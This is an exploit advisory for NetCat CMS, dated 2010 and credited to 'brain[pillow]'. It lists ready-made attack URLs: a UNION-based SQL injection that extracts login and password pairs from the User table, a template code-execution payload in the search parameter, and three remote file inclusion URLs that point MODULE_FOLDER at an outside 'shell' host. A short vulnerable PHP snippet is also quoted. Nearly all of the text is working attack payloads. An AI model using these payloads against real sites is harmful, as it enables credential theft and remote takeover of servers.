# Exploit Title: NetCat CMS Code exec, SQL-injection# Google Dork: none# Date: 28.11.2010# Author: brain[pillow]# Software Link: http://netcat.ru/# Version: UNKNOWN
On different versions of this software next vulnerabilities are availible:=======================================================# Sql-injection:/search/?action=index&text=q')+union+select+1,1,concat_ws(0x3a,login,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+User%23=======================================================# Code exec:/search/?action=index&text={${phpinfo()}}# Remote File Inclusion:=================================# Vuln code example:=================================<?php
/* $Id: function.inc.php 32722009-05-2514:34:42Z vadim $ */// get global value (for admin mode)global $MODULE_FOLDER;// include need classes
include_once ($MODULE_FOLDER."filemanager/nc_filemanager.class.php");
?>================================# Three exploits:================================/netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://shell?
/netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://shell?
/netcat/modules/logging/function.inc.php?MODULE_FOLDER=http://shell?